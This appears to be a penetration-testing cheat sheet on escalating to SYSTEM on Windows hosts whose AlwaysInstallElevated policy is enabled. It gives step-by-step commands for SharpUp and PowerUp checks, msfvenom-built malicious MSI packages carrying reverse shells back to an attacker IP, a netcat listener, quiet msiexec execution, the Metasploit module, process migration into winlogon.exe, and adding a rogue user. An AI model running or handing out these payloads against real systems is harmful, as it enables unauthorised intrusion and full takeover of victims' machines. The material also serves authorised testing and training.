Always Installed Elevated exploitation
Last updated
Last updated
The target needs to have those values in the registry:
In Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer with the AlwaysInstallElevated set to 1
In Computer\HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer with the AlwaysInstallElevated set to 1 This means that installation packages are installed with elevated privileges
Type reg query HKLM\Software\Policies\Microsoft\Windows\Installer in a cmd prompt should be set to 1
Type reg query HKCU\Software\Policies\Microsoft\Windows\Installer should be one as well
You should have a shell with covenant, metasploit or netcat or an access to the target. We will use Covenant and Metasploit here.
In your shell type SharpUp audit
In the results you should see this:
Click on execute
Type powershell invoke-allchecks in your shell
We should see this
generate a payload with msfvenom msfvenom -p windows/exec CMD="" -f msi -o exploitalwaysinstalled.msi between the quotes copy and paste an encoded launcher.
Upload your file in the target using Upload command from covenant (type Upload and enter, file the file path for the target and browse to the file in your attack machine)
run it using `shell msiexec /quiet /qn /i exploitalwaysinstalled.msi
We should get a prompt for another reverse shell in our grunts as an elevated user
powershell -ep bypass
. .\PowerUp.ps1
Write-UserAddMSI
It will set up a malicious MSI called UserAdd
Interact with a session you should already have from initial foothold sessions -i num-of-session
Launch run post/multi/recon/local_exploit_suggester
You should see: - exploit/windows/local/always_install_elevated: The target is vulnerable.
Background your session with ctrl z
Type use exploit/windows/local/always_install_elevated
set session to the number of the session you have on your target
type exploit -j
list the sessions you should have another one running as authority system
type ps and look for a process under session 1 so that we can migrate to it
We can use winlogon.exe 620 520 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
Migrate to it using migrate PID-number in our example it is going to be migrate 520
OR
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost your-Kali-IP
run
In another console tab msfvenom -p windows/meterpreter/reverse_tcp lhost=Your-Kali-IP -f msi -o setup.msi
Get the generated msi in your target (python server -> browser from target)
In your target Place setup.msi in a folder where you have write access
Open command prompt and type: msiexec /quiet /qn /i C:\Folder\you\chose\setup.msi
Generate a malicious MSI package msfvenom -p windows/shell_reverse_tcp lhost=IP-OF-ATTACK-MACHINE lport=PORT -f msi > file.msi
Set up a listener rlwrap nc -lnvp CHOSEN-PORT
Upload it to the target and execute it from the cmd msiexec /i c:\users\user\desktop\file.msi /quiet /qn /norestart
You should get an elevated shell
In the shell we will type PowerShellImport, type enter and fetch PoweUp.ps1 (if you do not have it you can get it )
And we will be able to add a user
Our user has been added
You should get an elevated shell in msfconsole
